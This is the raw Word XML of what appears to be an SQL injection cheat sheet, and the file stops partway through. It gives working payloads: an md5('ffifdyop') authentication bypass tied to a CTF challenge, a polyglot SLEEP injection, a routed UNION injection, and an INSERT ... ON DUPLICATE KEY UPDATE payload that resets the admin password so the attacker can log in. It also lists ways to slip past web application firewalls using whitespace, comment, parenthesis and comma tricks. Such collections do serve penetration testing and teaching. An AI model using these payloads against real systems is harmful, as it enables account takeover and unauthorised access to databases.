      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>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032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B243E" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B92">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="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Allowing an attacker to craft a string with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> statement such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' or 'SOMETHING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761A2DD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005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ffifdyop"</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true</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'or'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="24292E"/>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r</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655EAB90"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Challenge demo available at </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00CC3B92">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://web.jarvisoj.com:32772</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE88E59" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Polyglot injection (multicontext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9E0C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SLEEP(</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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*' or SLEEP(1) or '" or SLEEP(1) or "*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720C9E5" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Routed injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE385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admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' AND 1=0 UNION ALL SELECT '</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4863A" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insert Statement - ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE1505"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ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009324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Inject using payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA2AA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  attacker_dummy@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash_of_qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"), ("</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash_of_qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>") ON DUPLICATE KEY UPDATE password="</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash_of_qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA31B3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B58D37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The query would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B47F8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032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO users (email, password) VALUES ("</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker_dummy@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash_of_qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"), ("</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash_of_qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>") ON DUPLICATE KEY UPDATE password="</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt_hash_of_qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" -- "</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32F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"bcrypt_hash_of_your_password_input"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E147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1B42E0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This query will insert a row for the user “attacker_dummy@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”. It will also insert a row for the user “admin@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857056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Because this row already exists, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DUPLICATE KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword tells MySQL to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`password`</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> column of the already existing row to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"bcrypt_hash_of_qwerty"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7837F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8079A8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After this, we can simply authenticate with “admin@</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example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com</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the password “qwerty”!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C015CB" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B9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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>WAF Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210E40B"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No Space (%20) - bypass using whitespace alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D091E8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%09and%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>091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09</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6465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%0Dand%0D1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%0D</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A265CA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%0Cand%0C1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%0C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCC6E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%0Band%0B1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%0B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127AF7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%0Aand%0A1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%0A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8415F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%A0and%A01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%A0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B907B"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No Whitespace - bypass using comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F279C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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*comment*/</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6A737D"/>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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52379360"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lastRenderedPageBreak/>
        <w:t>No Whitespace - bypass using parenthesis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391DA4E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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C7315"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No Comma - bypass using OFFSET, FROM and JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE7D0C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LIMIT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0</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LIMIT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OFFSET </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442696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SUBSTR(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
